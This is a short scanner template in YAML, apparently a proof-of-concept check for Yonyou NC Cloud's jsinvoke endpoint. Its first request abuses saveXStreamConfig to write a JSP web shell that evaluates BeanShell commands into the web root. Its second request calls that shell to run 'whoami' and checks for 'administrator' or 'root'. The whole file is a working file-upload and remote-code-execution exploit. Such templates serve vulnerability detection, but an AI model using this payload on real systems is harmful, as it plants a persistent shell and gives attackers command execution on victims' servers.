name: yongyou-cloud-jsinvoke-uploadfile
set:
  r1: randomLowercase(6)
rules:
  - method: POST
    path: "/uapjs/jsinvoke/?action=invoke"
    headers:
      Content-Type: application/json
    body: |
      {
          "serviceName":"nc.itf.iufo.IBaseSPService",
          "methodName":"saveXStreamConfig",
          "parameterTypes":[
              "java.lang.Object",
              "java.lang.String"
          ], 
          "parameters":[
              "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
              "webapps/nc_web/{{r1}}.jsp"
          ]
      }
    expression: |
      response.status == 200
  - method: GET
    path: "/{{r1}}.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())"
    expression: |
      response.status == 200 && response.body.ibcontains(b'<string>') && response.body.ibcontains(b'<string>') &&  response.body.ibcontains(b'</string>') &&  response.body.ibcontains(b'<?xml') &&  (response.body.ibcontains(b'administrator') || response.body.ibcontains(b'root'))
detail:
  author: 666